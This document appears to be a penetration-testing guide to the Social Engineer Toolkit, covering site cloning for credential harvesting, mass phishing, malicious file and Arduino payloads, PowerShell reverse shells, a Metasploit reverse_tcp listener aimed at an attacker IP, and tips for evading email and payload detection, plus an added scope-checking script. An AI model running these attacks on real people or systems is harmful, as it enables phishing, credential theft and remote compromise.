# Social Engineer Toolkit (SET)

The Social Engineer Toolkit (SET) is an open-source penetration testing framework designed for social-engineering attacks. Developed by David Kennedy (ReL1K) and the TrustedSec team, SET automates a number of social-engineering attacks and provides a comprehensive platform for testing human vulnerabilities in security assessments.

## Installation and Configuration

### Installation on Kali Linux

```bash
# SET comes pre-installed on Kali Linux
setoolkit

# Update SET
cd /opt/set
git pull
```

### Manual Installation

```bash
# Clone repository
git clone https://github.com/trustedsec/social-engineer-toolkit/ set/
cd set/

# Install dependencies
pip3 install -r requirements.txt

# Run setup
python3 setup.py install

# Launch SET
python3 setoolkit
```

### Configuration

```bash
# Edit configuration file
nano /etc/setoolkit/set.config

# Key configuration options:
# WEBATTACK_EMAIL=ON
# APACHE_SERVER=ON
# METASPLOIT_PATH=/usr/share/metasploit-framework
# SENDMAIL=ON
# EMAIL_PROVIDER=GMAIL
```

## Main Menu Options

### 1) Social-Engineering Attacks

```bash
# Launch SET
setoolkit

# Select option 1 from main menu
# Social-Engineering Attacks submenu:
# 1) Spear-Phishing Attack Vectors
# 2) Website Attack Vectors
# 3) Infectious Media Generator
# 4) Create a Payload and Listener
# 5) Mass Mailer Attack
# 6) Arduino-Based Attack Vector
# 7) Wireless Access Point Attack Vector
# 8) QRCode Generator Attack Vector
# 9) Powershell Attack Vectors
# 10) Third Party Modules
```

### Spear-Phishing Attack Vectors

```bash
# Option 1 from Social-Engineering Attacks
# Spear-Phishing submenu:
# 1) Perform a Mass Email Attack
# 2) Create a FileFormat Payload
# 3) Create a Social-Engineering Template

# Mass Email Attack
# - Configure SMTP settings
# - Import email list
# - Create or select email template
# - Attach malicious payload

# FileFormat Payload
# - Select file format (PDF, DOC, XLS, etc.)
# - Choose exploit
# - Generate malicious file

# Email Templates
# - Pre-built templates for common scenarios
# - Custom template creation
# - HTML email support
```

### Website Attack Vectors

```bash
# Option 2 from Social-Engineering Attacks
# Website Attack submenu:
# 1) Java Applet Attack Method
# 2) Metasploit Browser Exploit Method
# 3) Credential Harvester Attack Method
# 4) Tabnabbing Attack Method
# 5) Web Jacking Attack Method
# 6) Multi-Attack Web Method
# 7) HTA Attack Method

# Credential Harvester
# - Clone legitimate websites
# - Capture credentials
# - Redirect after capture
# - Email harvested credentials

# Java Applet Attack
# - Self-signed Java applet
# - Social engineering prompt
# - Payload execution after acceptance

# Browser Exploit Method
# - Metasploit browser exploits
# - Automatic exploitation
# - Multiple exploit attempts
```

## Attack Scenarios

### Credential Harvesting

```bash
# Start SET
setoolkit

# Select: 1) Social-Engineering Attacks
# Select: 2) Website Attack Vectors
# Select: 3) Credential Harvester Attack Method

# Harvester options:
# 1) Web Templates
# 2) Site Cloner
# 3) Custom Import

# Site Cloner example:
# Enter URL to clone: https://gmail.com
# SET will clone the site and host locally
# Captured credentials saved to /root/.set/reports/
```

### Email Phishing Campaign

```bash
# Start SET
setoolkit

# Select: 1) Social-Engineering Attacks
# Select: 1) Spear-Phishing Attack Vectors
# Select: 1) Perform a Mass Email Attack

# Configuration steps:
# 1) Select attack vector (fileformat, etc.)
# 2) Configure payload
# 3) Setup email template
# 4) Configure SMTP settings
# 5) Import target email list
# 6) Send campaign

# Email list format (emails.txt):
# user1@company.com
# user2@company.com
# user3@company.com
```

### Infectious Media Generator

```bash
# Start SET
setoolkit

# Select: 1) Social-Engineering Attacks
# Select: 3) Infectious Media Generator

# Media options:
# 1) File-Format Exploits
# 2) Standard Metasploit Executable

# File-Format Exploits:
# - PDF exploits
# - Microsoft Office exploits
# - Browser-based exploits

# Standard Executable:
# - Windows executable
# - Linux executable
# - Mac OSX executable
```

### PowerShell Attack Vectors

```bash
# Start SET
setoolkit

# Select: 1) Social-Engineering Attacks
# Select: 9) Powershell Attack Vectors

# PowerShell options:
# 1) PowerShell Alphanumeric Shellcode Injector
# 2) PowerShell Reverse Shell
# 3) PowerShell Bind Shell
# 4) PowerShell Dump SAM Database

# Reverse Shell example:
# Enter IP address for reverse connection
# Enter port for reverse connection
# Generate PowerShell command
# Execute on target system
```

## Advanced Techniques

### Custom Payloads

```bash
# Create custom payload
setoolkit

# Select: 1) Social-Engineering Attacks
# Select: 4) Create a Payload and Listener

# Payload options:
# 1) Windows Shell Reverse_TCP
# 2) Windows Meterpreter Reverse_TCP
# 3) Windows Meterpreter Reverse_HTTP
# 4) Windows Meterpreter Reverse_HTTPS
# 5) Linux Shell Reverse_TCP

# Configuration:
# Set LHOST (attacker IP)
# Set LPORT (listening port)
# Generate payload
# Setup listener
```

### Multi-Attack Web Method

```bash
# Start SET
setoolkit

# Select: 1) Social-Engineering Attacks
# Select: 2) Website Attack Vectors
# Select: 6) Multi-Attack Web Method

# Combines multiple attack vectors:
# - Java Applet Attack
# - Metasploit Browser Exploit
# - Credential Harvester
# - Tabnabbing
# - Web Jacking

# Increases success probability
# Automatic fallback methods
# Comprehensive attack coverage
```

### Arduino-Based Attacks

```bash
# Start SET
setoolkit

# Select: 1) Social-Engineering Attacks
# Select: 6) Arduino-Based Attack Vector

# Arduino attack types:
# 1) Powershell HTTP GET MSF Payload
# 2) WSCRIPT HTTP GET MSF Payload
# 3) Powershell HTTP POST MSF Payload
# 4) WSCRIPT HTTP POST MSF Payload
# 5) Download-Execute Powershell Attack
# 6) Download-Execute WSCRIPT Attack

# Generates Arduino sketch
# Physical access required
# Automated payload execution
# Bypasses software restrictions
```

## Integration with Metasploit

### Metasploit Integration Setup

```bash
# Configure Metasploit path in SET
nano /etc/setoolkit/set.config

# Set Metasploit path:
METASPLOIT_PATH=/usr/share/metasploit-framework

# Start Metasploit listener
msfconsole
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST attacker_ip
msf6 exploit(multi/handler) > set LPORT 4444
msf6 exploit(multi/handler) > exploit -j
```

### Automated Listener Setup

```bash
# SET can automatically setup Metasploit listeners
# When creating payloads, select:
# "Do you want to start the listener now? [y/n]:"
# Select 'y' for automatic listener setup

# SET will:
# 1) Generate appropriate payload
# 2) Start msfconsole
# 3) Configure handler
# 4) Start listener
```

## Reporting and Logging

### Credential Reports

```bash
# Harvested credentials location
ls -l /root/.set/reports/

# View captured credentials
cat /root/.set/reports/2024-01-01\ 12:00:00.txt

# Email reports (if configured)
# Automatic email notifications
# Real-time credential capture alerts
```

### Attack Logs

```bash
# SET log files
ls -l /root/.set/logs/

# View attack logs
tail -f /root/.set/logs/set_logfile.log

# Apache access logs (for web attacks)
tail -f /var/log/apache2/access.log

# Email logs
tail -f /var/log/mail.log
```

### Custom Reporting

```bash
# Generate custom reports
# Parse log files for specific information
grep "credential" /root/.set/logs/set_logfile.log

# Extract IP addresses
grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" /root/.set/logs/set_logfile.log

# Count successful attacks
grep -c "successful" /root/.set/logs/set_logfile.log
```

## Evasion Techniques

### Email Evasion

```bash
# Domain reputation management
# Use legitimate email providers
# Gradual sending patterns
# Personalized content

# Email headers manipulation
# SPF/DKIM configuration
# Reply-to address spoofing
# Message threading

# Content evasion
# Image-based content
# URL shorteners
# Legitimate file hosting
```

### Web Attack Evasion

```bash
# Domain fronting
# CDN utilization
# SSL/TLS encryption
# Legitimate hosting providers

# User-Agent rotation
# IP address rotation
# Traffic timing variation
# Legitimate referrer headers

# Content delivery
# Staged payloads
# Encrypted communications
# Legitimate file formats
```

### Payload Evasion

```bash
# Encoding techniques
# Encryption methods
# Packing/compression
# Code obfuscation

# Delivery methods
# Legitimate file formats
# Trusted applications
# Signed executables

# Execution techniques
# Living off the land
# PowerShell alternatives
# Memory-only execution
```

## Best Practices

### Legal and Ethical Considerations

```bash
# Always obtain proper authorization
# Document scope and limitations
# Follow responsible disclosure
# Maintain confidentiality

# Create engagement documentation
echo "Social Engineering Test Authorization" > authorization.txt
echo "Client: Company Name" >> authorization.txt
echo "Scope: Email addresses, domains" >> authorization.txt
echo "Date: $(date)" >> authorization.txt
echo "Tester: Your Name" >> authorization.txt
```
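
A pre-flight check that ties the `emails.txt` target list from the Email Phishing Campaign section to the scope recorded for the engagement, so no message goes to an address the client did not authorize. This is an added example, not part of SET or of the original page; the `scope_domains.txt` file, the function names and the sample addresses are assumptions constructed for illustration.

```bash
#!/usr/bin/env bash
# Added example: pre-flight scope check for a target list in the emails.txt format.
# scope_domains.txt (one authorized domain per line) is an assumed companion file
# to authorization.txt; all addresses below are constructed sample data.

# Print each entry that is malformed or whose domain is not in the scope file.
# Matching is exact and case-insensitive: subdomains must be listed explicitly.
# A missing or empty scope file flags every address (fail closed).
out_of_scope() {
    local scope_file="$1" list="$2"
    awk -v scope="$scope_file" '
        BEGIN {
            while ((getline d < scope) > 0) {
                gsub(/[ \t\r]/, "", d)
                if (d != "" && d !~ /^#/) allowed[tolower(d)] = 1
            }
        }
        { gsub(/[ \t\r]/, "") }        # tolerate CRLF and stray whitespace
        /^$/ || /^#/ { next }          # skip blank lines and comments
        {
            n = split($0, part, "@")
            dom = (n == 2) ? tolower(part[2]) : ""
            if (n != 2 || part[1] == "" || !(dom in allowed)) print
        }
    ' "$list"
}

# Gate: succeed only when every address is in scope; list offenders on stderr.
check_scope() {
    local bad
    bad=$(out_of_scope "$1" "$2")
    if [ -n "$bad" ]; then
        printf 'Out of scope, do not send:\n%s\n' "$bad" >&2
        return 1
    fi
}

# Constructed sample: two in-scope targets, one third-party address, one typo.
demo_dir=$(mktemp -d)
printf 'company.com\n' > "$demo_dir/scope_domains.txt"
printf '%s\n' user1@company.com user2@company.com \
    user3@partner-corp.example not-an-address > "$demo_dir/emails.txt"
check_scope "$demo_dir/scope_domains.txt" "$demo_dir/emails.txt" ||
    echo "Campaign blocked until the list matches the authorization."
```

Keep the scope file under the same change control as the signed authorization, and rerun the check whenever the list is edited.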

### Operational Security

```bash
# Use dedicated infrastructure
# Implement proper logging
# Secure communication channels
# Regular backup procedures

# Infrastructure isolation
# Separate testing networks
# Dedicated email accounts
# Isolated web servers

# Data protection
# Encrypted storage
# Secure transmission
# Proper disposal
```

### Testing Methodology

```bash
# Reconnaissance phase
# Target identification
# Information gathering
# Attack vector selection

# Execution phase
# Payload delivery
# Credential harvesting
# System compromise

# Post-exploitation
# Persistence establishment
# Data collection
# Evidence gathering

# Reporting phase
# Impact assessment
# Remediation recommendations
# Executive summary
```

## Troubleshooting

### Common Issues

```bash
# Email delivery problems
# Check SMTP configuration
# Verify DNS settings
# Test email connectivity

# Web server issues
# Check Apache configuration
# Verify port availability
# Test web connectivity

# Payload generation errors
# Verify Metasploit integration
# Check dependencies
# Update SET framework

# Permission issues
# Run as root user
# Check file permissions
# Verify directory access
```

### Configuration Fixes

```bash
# Reset SET configuration
rm /etc/setoolkit/set.config
setoolkit  # Will recreate config

# Update SET framework
cd /opt/set
git pull
python3 setup.py install

# Fix Apache issues
sudo systemctl restart apache2
sudo systemctl enable apache2

# Fix email issues
sudo systemctl restart postfix
sudo systemctl enable postfix
```

## Resources

- SET Official Documentation
- TrustedSec Blog
- Social Engineering Framework
- NIST Cybersecurity Framework
- SANS Social Engineering